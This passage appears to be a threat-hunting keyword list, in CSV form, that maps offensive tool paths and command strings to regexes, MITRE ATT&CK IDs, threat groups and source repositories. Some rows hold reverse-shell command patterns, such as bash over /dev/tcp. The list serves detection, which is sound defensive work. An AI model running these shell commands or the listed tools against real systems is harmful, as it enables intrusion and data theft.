"*/BetterSafetyKatz.exe*",".{0,1000}\/BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - 
TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5610" "*/BetterSafetyKatz.exe*",".{0,1000}\/BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5611" "*/bgp_exfil.py*",".{0,1000}\/bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","5612" "*/bh_owned.py*",".{0,1000}\/bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5613" "*/BHF Rat v * beta.exe*",".{0,1000}\/BHF\sRat\sv\s.{0,1000}\sbeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - 
T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5614" "*/bhqc.py -*",".{0,1000}\/bhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful information from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","5615" "*/BIFFRecordEncryption.cs*",".{0,1000}\/BIFFRecordEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","5616" "*/Bifrost RAT Of Evil.exe*",".{0,1000}\/Bifrost\sRAT\sOf\sEvil\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5617" "*/big_shell_pwd.7z*",".{0,1000}\/big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","5618" "*/bin/0d1n*",".{0,1000}\/bin\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","#linux","N/A","7","","N/A","","","","5619" "*/bin/AceLdr*",".{0,1000}\/bin\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","#linux","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","5620" "*/bin/bash -c ""php -q -S 0.0.0.0:80 &"" > /dev/null 
2>&1*",".{0,1000}\/bin\/bash\s\-c\s\""php\s\-q\s\-S\s0\.0\.0\.0\:80\s\&\""\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","5621" "*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*",".{0,1000}\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","5622" "*/bin/fake-sms*",".{0,1000}\/bin\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","#linux","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","5627" "*/bin/gonnacry*",".{0,1000}\/bin\/gonnacry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","5628" "*/bin/gorsair *",".{0,1000}\/bin\/gorsair\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation 
tool","https://github.com/Ullaakut/Gorsair","1","0","#linux","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","5629" "*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","5630" "*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","5631" "*/bin/hakrawler*",".{0,1000}\/bin\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","5632" "*/bin/htran*",".{0,1000}\/bin\/htran.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location.
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#linux","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","5633" "*/bin/kidlogger*",".{0,1000}\/bin\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","5634" "*/bin/nxcdb*",".{0,1000}\/bin\/nxcdb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","5637" "*/bin/posh*",".{0,1000}\/bin\/posh.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","#linux","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","5639" 
"*/bin/processhider*",".{0,1000}\/bin\/processhider.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","5640" "*/bin/proxy_cli.py*",".{0,1000}\/bin\/proxy_cli\.py.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","#linux","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","5641" "*/bin/pspsy*",".{0,1000}\/bin\/pspsy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","5642" "*/bin/pupysh*",".{0,1000}\/bin\/pupysh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5643" "*/bin/read_i.php?a1=step2-down-b&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-b\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5644" "*/bin/read_i.php?a1=step2-down-c&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-c\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5645" "*/bin/read_i.php?a1=step2-down-j&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-j\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5646" "*/bin/read_i.php?a1=step2-down-k&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-k\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - 
T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5647" "*/bin/read_i.php?a1=step2-down-r&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-r\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5648" "*/bin/read_i.php?a1=step2-down-u&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-u\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","5649" "*/bin/rotateproxy*",".{0,1000}\/bin\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","5650" "*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - 
TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","5653" "*/bin/Sleeper.o*",".{0,1000}\/bin\/Sleeper\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","#linux","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","5655" "*/bin/tor2web*",".{0,1000}\/bin\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that 
enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","5658" "*/bin/torify*",".{0,1000}\/bin\/torify.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attackers for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","5659" "*/bin/tshd*",".{0,1000}\/bin\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","5660" "*/bin/unshackle*",".{0,1000}\/bin\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","5663" "*/bin/wapiti*",".{0,1000}\/bin\/wapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","#linux","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","5664"
"*/bin2hex.lua*",".{0,1000}\/bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","5667" "*/bind_powershell.rb*",".{0,1000}\/bind_powershell\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5668" "*/bindshell.lua*",".{0,1000}\/bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","5669" "*/bin-sploits/*.zip*",".{0,1000}\/bin\-sploits\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","5670" "*/BITB.git*",".{0,1000}\/BITB\.git.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 
- T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","5671" "*/BITB-main*",".{0,1000}\/BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","5672" "*/bitcoin-getaddr.nse*",".{0,1000}\/bitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5673" "*/bitcoin-info.nse*",".{0,1000}\/bitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5674" "*/bitcoinrpc-info.nse*",".{0,1000}\/bitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5675" "*/bitsadmin/bitsadmin.cmd*",".{0,1000}\/bitsadmin\/bitsadmin\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","5677" "*/BitsArbitraryFileMove*",".{0,1000}\/BitsArbitraryFileMove.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
